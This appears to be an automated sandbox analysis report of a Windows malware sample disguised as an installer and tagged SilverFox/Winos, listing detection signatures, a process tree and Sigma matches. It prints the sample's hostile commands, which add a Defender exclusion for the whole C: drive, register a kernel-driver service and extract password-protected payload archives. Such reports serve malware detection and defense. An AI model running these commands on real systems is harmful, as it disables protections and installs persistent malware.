Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.4.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
renamed because original name is a hash value
Original sample name:_2.0.4.exe
Analysis ID:1579693
MD5:a32b45411fdacb8dc364e2ecc75f7c54
SHA1:a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
SHA256:1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: A32B45411FDACB8DC364E2ECC75F7C54)
    • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7300 cmdline: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 7316 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7880 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: A32B45411FDACB8DC364E2ECC75F7C54)
        • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 7600 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7680 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7568 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7584 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7768 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7896 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7924 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8144 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3492 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7620 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7740 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7760 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7860 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7876 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7980 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7944 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7344 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7116 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6948 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5228 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7852 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7888 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7300, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7316, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7584, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7300, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7316, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7584, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7300, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7316, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 10%Perma Link
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeVirustotal: Detection: 9%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.9% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000B.00000003.1738474598.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1738614341.0000000003640000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7AAEC0 FindFirstFileA,FindClose,5_2_6C7AAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00C76868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00C77496
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
